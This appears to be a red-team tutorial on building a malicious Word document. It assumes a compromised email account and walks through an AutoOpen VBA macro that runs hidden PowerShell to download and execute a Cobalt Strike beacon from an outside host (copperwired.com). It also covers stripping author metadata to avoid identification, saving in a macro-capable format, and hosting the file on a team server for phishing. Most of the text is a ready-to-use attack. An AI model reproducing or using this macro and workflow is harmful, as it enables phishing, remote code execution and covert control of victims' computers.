VBA Macro Beacon

Introduction

If we've compromised a users email we've opened a door to many possibilities. We can search the users emails, discover new users, reveal technologies in place, and send email on behalf of the user. Note: files that are emailed internally are not tagged with .

Visual Basic for Applications (VBA) is commonly used to enhance functionality in Excel and Word.

VBA Beacon Macro

Create Word Macro

We can create a macro in word by going View -> Macros -> Create.

Note: Make sure to change the macro name to "AutoOpen" and set the "Macros in" to the current document (Document1).

Create VBA Script

Sub AutoOpen()

  Dim Shell As Object
  Set Shell = CreateObject("wscript.shell")
  Shell.Run "notepad"

End Sub

Create Beacon PowerShell payload.

The easiest way to get a Beacon through a VBA macro is to use a PowerShell Beacon. To do so, go to Attacks -> Scripted Web Delivery (S). After that, generate a PowerShell payload & copy and paste it.

Next, copy the PowerShell payload to the VBA Macro

Sub AutoOpen()

  Dim Shell As Object
  Set Shell = CreateObject("wscript.shell")
  Shell.Run  "powershell.exe -nop -w hidden -c ""IEX ((new-object net.webclient).downloadstring('http://copperwired.com/a'))"""

End Sub

Save the Macro, return the Word and go File -> Info -> Inspect Document. Remove Document Properties and Personal Information. This will prevent out username and other information from being leaked.

Next we'll save it. It's important to save the Macro as a .doc instead of .docx. This is because .docx does not allow Macros. Additionally, you can use .docm but that's not really what we're looking for.

We'll upload this file to our Cobalt Strike team server. Go to Site Management -> Host File and select our new .doc file.